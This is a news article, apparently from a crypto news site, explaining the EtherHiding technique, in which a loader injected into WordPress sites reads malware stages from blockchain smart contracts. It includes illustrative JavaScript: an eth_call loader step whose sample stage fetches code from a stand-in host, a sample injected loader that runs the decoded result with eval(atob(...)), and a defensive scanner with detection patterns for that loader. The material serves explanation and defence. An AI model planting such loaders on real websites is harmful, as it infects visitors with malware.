North Korean Hackers Use Blockchain to Hide Malware in New Campaign

By admin, 19 October 2025

**EtherHiding: How Hackers Use Blockchain to Host Malware Untraceably**

A technique known as EtherHiding, now seen in a new campaign, uses smart contracts on public blockchains such as Ethereum and BNB Smart Chain to store malicious payloads. Because the chain's record cannot be rewritten, the payload cannot be taken down the way a malicious web server or domain can, which makes the technique unusually hard for security teams to disrupt.

### What Is EtherHiding?

According to Google’s Threat Intelligence Group (GTIG), EtherHiding involves placing small pieces of harmful code inside smart contracts on public blockchains. The chain's history cannot be deleted or rewritten, so there is no hosting provider to send a takedown notice to. Note that the contract's storage is not frozen for the attacker: whoever controls the contract can update the stored payload with a new transaction, so the operators can swap stages at will while defenders cannot remove them.

### How EtherHiding Works

Hackers begin by compromising WordPress websites, often using stolen login credentials or unpatched plugin vulnerabilities. They then inject a small JavaScript loader into the site's pages. When a visitor loads a page, the loader queries a smart contract through a public RPC endpoint and retrieves the next stage of the malware from the contract's storage. Because this is a read-only call (eth_call), it creates no on-chain transaction, costs no gas and leaves no trace on the ledger; the attacker pays gas only when updating the stored payload.
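As an added example, not the campaign's actual loader, the snippet below shows the two technical steps the paragraph describes: the JSON-RPC `eth_call` body a browser loader would POST to a public RPC node, and how the ABI-encoded `string` the contract returns is decoded back into the next stage. The contract address, the `get()` selector and the sample stage are assumptions made for illustration; the response is constructed locally so the code runs offline.

```javascript
// Added example (not the campaign's code): the read-only contract query of an
// EtherHiding-style loader, and decoding of the ABI-encoded string it returns.
// The contract address and function selector are hypothetical placeholders.

const CONTRACT = "0x1111111111111111111111111111111111111111"; // hypothetical contract
const SELECTOR = "0x6d4ce63c"; // assumed 4-byte selector of a `get()` view function

// Build the JSON-RPC body a loader would POST to a public RPC endpoint.
// eth_call runs a view function off-chain: no transaction, no gas, nothing on the ledger.
function buildEthCallRequest(contract, selector, id = 1) {
  return {
    jsonrpc: "2.0",
    id,
    method: "eth_call",
    params: [{ to: contract, data: selector }, "latest"],
  };
}

// ABI-encode a Solidity `string` return value: head word (offset 32), length word,
// then the bytes right-padded to a 32-byte boundary. Used here to build the sample only.
function encodeAbiString(str) {
  const data = Buffer.from(str, "utf8").toString("hex");
  const padded = data.padEnd(Math.ceil(data.length / 64) * 64, "0");
  const offset = (32).toString(16).padStart(64, "0");
  const length = (data.length / 2).toString(16).padStart(64, "0");
  return "0x" + offset + length + padded;
}

// Decode the `result` field of an eth_call response whose function returns one `string`.
function decodeAbiString(resultHex) {
  const hex = resultHex.startsWith("0x") ? resultHex.slice(2) : resultHex;
  if (hex.length % 64 !== 0) throw new Error("malformed ABI data");
  const word = (i) => parseInt(hex.slice(i * 64, i * 64 + 64), 16);
  const offsetWord = word(0) / 32; // offset is in bytes, words are 32 bytes
  const length = word(offsetWord);
  const start = (offsetWord + 1) * 64;
  if (start + length * 2 > hex.length) throw new Error("string length exceeds payload");
  return Buffer.from(hex.slice(start, start + length * 2), "hex").toString("utf8");
}

// Constructed sample: a harmless stand-in for the stage a contract would hand back.
const SAMPLE_STAGE = "fetch('https://stage2.example.invalid/u.js').then(r=>r.text())";
const SAMPLE_RESPONSE = { jsonrpc: "2.0", id: 1, result: encodeAbiString(SAMPLE_STAGE) };

// What the loader does with the RPC reply before executing it.
function recoverStage(rpcResponse) {
  return decodeAbiString(rpcResponse.result);
}

// A real loader would now eval() or inject the decoded string; here it is only printed.
console.log(JSON.stringify(buildEthCallRequest(CONTRACT, SELECTOR)));
console.log(recoverStage(SAMPLE_RESPONSE));
```

For a defender, the request body is the useful part: a POST carrying `"method":"eth_call"` from a site that is not a dapp, sent to a public RPC host, is the network-visible footprint of this technique, and it is the same request whether the payload is the original one or one the attacker has since updated.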

The campaign using this technique was first identified in September 2023 under the name CLEARFAKE. It employed fake browser update alerts to trick users into installing malicious software, marking one of the earliest known uses of EtherHiding.

### Why Blockchain Hosting Makes Malware Hard to Stop

One of blockchain’s core features is immutability: the transaction history cannot be rewritten. That property underpins trust in the ledger, but it also means that once a payload has been written to a contract, no hosting provider, registrar or abuse desk can take it down. Removing it would require altering the chain itself, which is not realistic. Defenders can still clean the compromised websites and block the loader's path to the chain, but the payload itself stays available to any new loader that asks for it.

Moreover, most anti-malware tools do not currently analyze smart contracts for harmful content, allowing malware to persist undetected for long periods.

GTIG noted, “Although smart contracts offer innovative ways to build decentralized applications, their unchangeable nature is leveraged in EtherHiding.”

Citizen Lab researcher John Scott-Railton described EtherHiding as an “early-stage experiment” but warned that future iterations may become more sophisticated. He suggested potential developments could include malware that directly targets blockchain systems—especially those connected to wallets or transaction platforms.

### A Shift in North Korean Cyber Strategy

Cybersecurity experts see EtherHiding as part of a strategic evolution by North Korean state-sponsored hackers. Previously focused primarily on stealing cryptocurrency, they are now harnessing blockchain technology itself to distribute malware and maintain persistent operations.

Blockchain analytics company TRM Labs reports that North Korean hackers have stolen over $1.5 billion in cryptocurrency in 2023 alone, funds that are believed to support military projects and help evade international sanctions.

By embedding the payload in a decentralized network, the attackers can keep a campaign running even after the original compromised websites are cleaned or taken offline: a newly compromised site only needs the same small loader, and the contract keeps serving the payload.

### How Users and Developers Can Protect Themselves

GTIG advises the following steps to mitigate the risks associated with EtherHiding:

– **Block unknown or suspicious scripts** running on websites.
– **Disable unauthorized downloads** to prevent automatic malware installation.
– **Keep WordPress plugins and software up to date** to minimize vulnerabilities.
– **Enhance website security** to prevent initial breaches that enable loader injection.
– **Start scanning smart contracts** for malicious code, since blockchain code is public and traceable once identified.
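To make the "block suspicious scripts" and "prevent loader injection" advice concrete, here is an added example, not GTIG's or the campaign's tooling, of a heuristic scan that flags scripts in a page's HTML showing the combined traits of an EtherHiding-style loader: a browser-side `eth_call`, a contract address, a Web3 client library, or a decode-then-execute pattern. The indicator list is an assumption drawn from that behaviour rather than a published signature set, and the sample HTML, RPC host and contract address are constructed placeholders.

```javascript
// Added example (not GTIG's or the campaign's tooling): heuristic scan of a page's HTML
// for scripts that behave like an EtherHiding loader, i.e. a browser-side read-only
// contract query followed by decoding and executing what the contract returned.
// The indicator list is an assumption drawn from that behaviour, not a published signature set.

const INDICATORS = [
  // JSON-RPC method used to read contract state without a transaction
  { name: "json-rpc eth_call", re: /["']eth_call["']/ },
  // a 20-byte EVM address, the `to` field of the call
  { name: "contract address", re: /0x[0-9a-fA-F]{40}\b/ },
  // a Web3 client library on a site that is not a dapp is unusual
  { name: "web3 library", re: /\b(web3|ethers)(\.umd)?(\.min)?\.js\b/i },
  // decode-then-execute pattern: eval(atob(...)) / Function(atob(...))
  { name: "decode-and-run", re: /\b(eval|Function)\s*\([\s\S]{0,200}?\batob\s*\(/ },
];

// Pull every <script> element out of the HTML, keeping its src (if any) and inline body.
function extractScripts(html) {
  const scripts = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(m[1]);
    scripts.push({ src: src ? src[1] : null, body: m[2] });
  }
  return scripts;
}

// Report each script matching at least `minHits` indicators; one hit alone (an address,
// a library) is too weak, the combination is what characterises the loader.
function scanHtml(html, minHits = 2) {
  const findings = [];
  for (const s of extractScripts(html)) {
    const text = (s.src || "") + "\n" + s.body;
    const hits = INDICATORS.filter((i) => i.re.test(text)).map((i) => i.name);
    if (hits.length >= minHits) findings.push({ src: s.src, hits });
  }
  return findings;
}

// Constructed sample page: a normal theme script, a harmless inline script, and an
// injected inline loader. The RPC host and contract address are placeholders.
const SAMPLE_HTML = `<!doctype html><html><head>
<script src="https://cdn.example.invalid/theme.min.js"></script>
<script>console.log("harmless analytics stub");</script>
</head><body>
<script>(async()=>{const r=await fetch("https://rpc.example.invalid/",{method:"POST",
body:JSON.stringify({jsonrpc:"2.0",id:1,method:"eth_call",
params:[{to:"0x1111111111111111111111111111111111111111",data:"0x6d4ce63c"},"latest"]})});
const j=await r.json();eval(atob(j.result));})();</script>
</body></html>`;

console.log(JSON.stringify(scanHtml(SAMPLE_HTML), null, 2));
```

Run it over the rendered HTML of each page rather than only the theme files, since the injected loader is often inline, and treat a hit as a lead to the compromised file rather than proof: a legitimate dapp front-end will also issue `eth_call`, which is why the scan requires two indicators before flagging.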

The cybersecurity community is encouraged to monitor and classify harmful smart contracts proactively. Early detection and coordinated labeling can help reduce the impact of these emerging threats.

### Conclusion

EtherHiding represents a concerning development in cybercrime, exploiting blockchain’s unique properties to create malware hosting that is resilient to traditional defenses. As attackers innovate, it is critical for users, developers, and security teams to strengthen their defenses, stay informed, and collaborate on new detection methods to combat these sophisticated threats.
https://coincentral.com/north-korean-hackers-use-blockchain-to-hide-malware-in-new-campaign/
